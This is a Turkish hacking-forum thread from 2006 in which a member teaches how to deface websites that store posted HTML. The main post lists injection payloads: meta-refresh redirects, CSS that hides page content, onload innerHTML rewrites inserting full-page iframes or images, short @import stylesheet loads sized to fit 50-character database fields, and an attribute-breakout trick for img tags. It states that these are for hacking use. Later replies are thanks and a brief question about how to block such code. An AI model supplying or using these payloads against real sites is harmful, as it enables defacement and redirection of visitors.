İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

Index Atarken Kullanılan Html Tagları

21-09-2006 11:42
#1
3333 - ait Kullanıcı Resmi (Avatar)
Özel Üye
Üyelik tarihi:
12/2005
Nereden:
Little Town.
Mesajlar:
3.213
Teşekkür (Etti):
128
Teşekkür (Aldı):
1222
Konular:
1294
Ticaret:
(0) %
Bir sitenin ana sayfasına veya başka bir yerine post atabiliyorsunuz fakat bunu hack amaçlı kullanmak istiyorsanız işinize yarıyacak html taglarını seçmeniz gerekir*ben burda sitenin anasayfasına nasıl post gönderilir felan anlatmıycam sadece post gönderebiliyorsanız onu nasıl hack amaçlı kullanıcağınızı gösterecem...

1: en basit olan yönlendirme tagı

Kod:

<**** http-equiv=’*******’ content=’0; url=http://www.ornek.com’>


bu kod ile html post edebildiğiniz siteyi kendi site adresinize yönlendirebilirsiniz* sıkça kullanılan bir yöntemdir fakat kodun çalışması site yüklenmesinden sonra gerçekleşiyor...

2: style ile tam sayfa resim döşemek

Kod:

<bOdy><style type=text/css>table* p* td* tr{visibility:hidden;}bOdy {background-color: #000000;background-image: url(’http://www.ornek.com/resim.jpg’);}


bu kod ile sitede bulunan tabloları görünmez hale getirip kendi sitenizden çağırdığınız resmi tam sayfa döşemek için kullabilirsiniz...

3: çerçeve (frame) ile index

Kod:

<bOdy topmargin=0 leftmargin=0 onload="********.bOdy.innerHTML=’<iframe width=100% height=100% src=http://www.ornek.com></iframe>’;">


bu kod ile yönlendirme değilde aynı sayfa içinde kendi sitenizden çağırdığınız sayfayı tam sayfa yapabilirsiniz* yanlız bunu post etmeniz için db’nin en az 100 karakterden fazla karakter alması gerekiyor* isterseneniz topmargin=0 leftmargin=0 kodlarını silebilirsiniz ama bunlar olursa daha iyi olur çünkü bu sayede frame (çerçeve) tam sayfa olur eğer bunu iptal ederseniz sayfanın üst alt ve yanlarından biraz boşluk kalacaktır...

4: tam sayfa resim döşemek

Kod:

<bOdy topmargin=0 leftmargin=0 onload="********.bOdy.innerHTML=’<img width=100% height=100% src=http://www.ornek.com/resim.jpg></img>’;">



3. örnekte gördüğümüz ile aynı mantık ile çalışmaktadır ve siteye tam sayfa resmi döşemektedir...
5: .css çağırmak

Kod:

<link href=http://www.ornek.com/dosya.css type=text/css rel=stylesheet>


önce aşağıdaki style kodlarını bir txt dosyasına atıyoruz;

Kod:

BODY {SCROLLBAR-FACE-COLOR: #000000; SCROLLBAR-HIGHLIGHT-COLOR: #000000; SCROLLBAR-SHADOW-COLOR: darkgray; SCROLLBAR-3DLIGHT-COLOR: #000000; SCROLLBAR-ARROW-COLOR: #000000; SCROLLBAR-TRACK-COLOR: gray; SCROLLBAR-DARKSHADOW-COLOR: #000000}A:link {COLOR: darkblue; TEXT-DECORATION: none}A:visited {COLOR: #000000; TEXT-DECORATION: none}A:hover {COLOR: #000000}bOdy* td* th {color: #000000;}table* p* td* tr{visibility:hidden;}bOdy {background-color: #000000;background-image:url( color=#b9b9bdhttp://www.ornek.com/resim.jpg;background-position:center;background-repeat-repeat;background-position:top;}

not: ir2’nin kodlamasıdır...


daha sonra bunu .css veya başka bir uzantılı olarak kaydediyoruz* uzantısının .css olması önemli değil .tbt bile olsa <link href= "dosya.tbt" olarak çağırdığınız zaman çalışır...

6: farklı bir yol ile .css çağırmak...

Kod:

<style>@import url(http://www.ornek.com/a.css);

evet arkadaşlar bu benim favori kodum* şimdi 5. örnekte gördüğümüz işlemlerin aynısını yapalım fakat çağırmayı link ile değilde style ile çağıralım* peki bunun diğerlerinden farkı ne onu söyliyeyim genelde dbden veri okuturken veritabanında metin kategorisi seçilir ve bu access’de otomatik olarak 50 karakter sınır bırakılır yani 50 karakterden fazla veri giremessiniz işte o zaman bu kod çok işinize yarıyacak yani diğer kodlar 50 karakterden uzun olduğu için çalışmazken bu kod çalışacaktır...
site adresini mümkün olduğunca kısa tutun* dosya uzantınını a.a da yapabilirsiniz* site eğer site.com olarak çalışıyorsa www kullanmayın...

8: .swf ile yölendirme

Kod:

<embed src=http://www.ornek.com/ornek.swf>


yine aynı şekilde veritabanına kısıtlı bir veri işleniyorsa yani 50 karakterden az ve sizde sadece yönlendirmek istiyorsanız bu kod kullanılır...

7: resim çağırma

Kod:

<img src=http://www.ornek.com/resim.jpg>


eğer ben uğraşmak istemiyorum sadece bir resim çağırsam yeterli diyorsanız bunu kullanın

Not: Bir sitede veritabanından veriyi çağırırken html tagının içine çağırıyorsa önce o html tagını kapatıp sonra kendi kodumuzu çalıştırmalıyız mesela <img src= "resim.jpg"> adam resim.jpg ismini dbden okutuyor ve biz html tagını resim.jpg ismine post ettiğimiz zaman normalde çalışmaz <img src= "<**** http-equiv=’*******’ content=’0; url=http://www.ornek.com’>"> çünkü bizim eklediğimiz kod img tagının src (resim) linki yerine geçer...
ama şöyle bir mantık geliştirirsek kendi ekliyeceğimiz koddan önce sitenin img tagını kapatıp sonrada kendi kodumuzu çalıştırırsak o zaman çalışır <img src= "><**** http-equiv= ******* content= 0; url=>http://www.ornek.com >> bu kod ile > img tagımızı kapattık ve daha sonra kendi html tagımızı çalıştırdık en sonda kalan > tagı ise boşta kaldı yani bir text yazısı gibi algılandı">
Kullanıcı İmzası
Biz arkamızı vatanımızdan ve atamızdan başka hiçbir şeye dayamayan, gücümüzü ve bütünlüğümüzü sadece milli değerlerimizden alan bir topluluğuz. Gururumuz ve Onurumuz Bizi biz yapan değerlerdir. Siz Turkhackteam üyeleri, hiç kimsenin kulu köpeği olmayan bu topluluğun bir parçası olduğunuz için çok değerlisiniz. Hepinize sonsuz teşekkürler




Bir Turk Hack Team Yöneticisi(!) MSN üzerinden sizi ekleyip size dosya göndermeye çalışırsa ve ya sizden kullanıcı adınızı ve şifrenizi isterse kesinlikle o kişilere inanmayınız. Bizler sizinle görüşme yapamayı istersek sizlere site üzerinden ulaşıp iletişim adresimizi veririz. Kötü Niyetli Kişilere Aldanmayın!!

Sitemiz üzerinden Kendi sitelerinin reklamını yapanlara mahal vermeyiniz. Sizlere Özel mesajla veya diğer platformlardan kendi sitelerine çekmeye çalışanları bizlere bildiriniz. Unutmayın Taklitler asıllarını yüceltir.



"Unutmayın !Yaktığınız can kadar canınız yanacak ve üzdüğünüz kadar üzüleceksiniz.."(Hadis-i Şerif)


A.D.D

21-09-2006 19:13
#2
Üyelik tarihi:
09/2006
Mesajlar:
288
Teşekkür (Etti):
0
Teşekkür (Aldı):
195
Konular:
91
Ticaret:
(0) %
bven bunu verdimmmmmmm...arkadasımmm yinede saoll...emege sayggı...
Kullanıcı İmzası
UltrAsLan


SAgopaKAjmer Derki;



Dusman kelimesinin anlamını Arkadas sıfatı tasıyanlarda ögrendim...
23-09-2006 22:15
#3
by_black_wolf - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
08/2006
Mesajlar:
86
Teşekkür (Etti):
0
Teşekkür (Aldı):
32
Konular:
11
Ticaret:
(0) %
saol + rap
13-10-2007 18:42
#4
Üyelik tarihi:
01/2007
Mesajlar:
6
Teşekkür (Etti):
0
Teşekkür (Aldı):
1
Konular:
0
Ticaret:
(0) %
Bundan nasıl koruna bılırım

yanı demek ıstegım su arakdaslar
bu yonlendırme kodlarını nasıl kapatırız
mesla bızım sıtede (turkhackteam) ' da ******* sekılnde gorunuyor
bu bu sekılde nasıl yapabılırız.
13-10-2007 18:48
#5
CorsaiR - ait Kullanıcı Resmi (Avatar)
Özel Üye
Üyelik tarihi:
12/2005
Nereden:
Bir Yerden
Mesajlar:
1.229
Teşekkür (Etti):
30
Teşekkür (Aldı):
705
Konular:
780
Ticaret:
(0) %
zaten vbulletin kullanıyorsan otomatik kapatır..
Kullanıcı İmzası
Acunu Yaratan Yüce Tanrı!

RK'e sağlam, sürekli irade ver!
Güçlüklerde sabrını, direncini aynı zamanda gayretini arttır!
Ona esas karakter olarak görev aşkı ve sorumluluk duygusu ver!
Sorumluluğu RK yurdundan eksik etme!
En büyük kuvvetin TÜRKLÜK sevgisi olduğunu RK'e öğret!

TANRI!

TÜRKÇE konuşulan, TÜRK'e yurtluk etmiş olan yerleri kıyamete kadar TÜRK'ün hükmü altında bırak !
13-10-2007 19:04
#6
Üyelik tarihi:
01/2007
Mesajlar:
6
Teşekkür (Etti):
0
Teşekkür (Aldı):
1
Konular:
0
Ticaret:
(0) %
Vbulletin kullanımıyorum
CMS sistemllerinden bırısını kullanıyorum
hem ben manual kapatamayı ogrenmek ısterım
saygılar.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı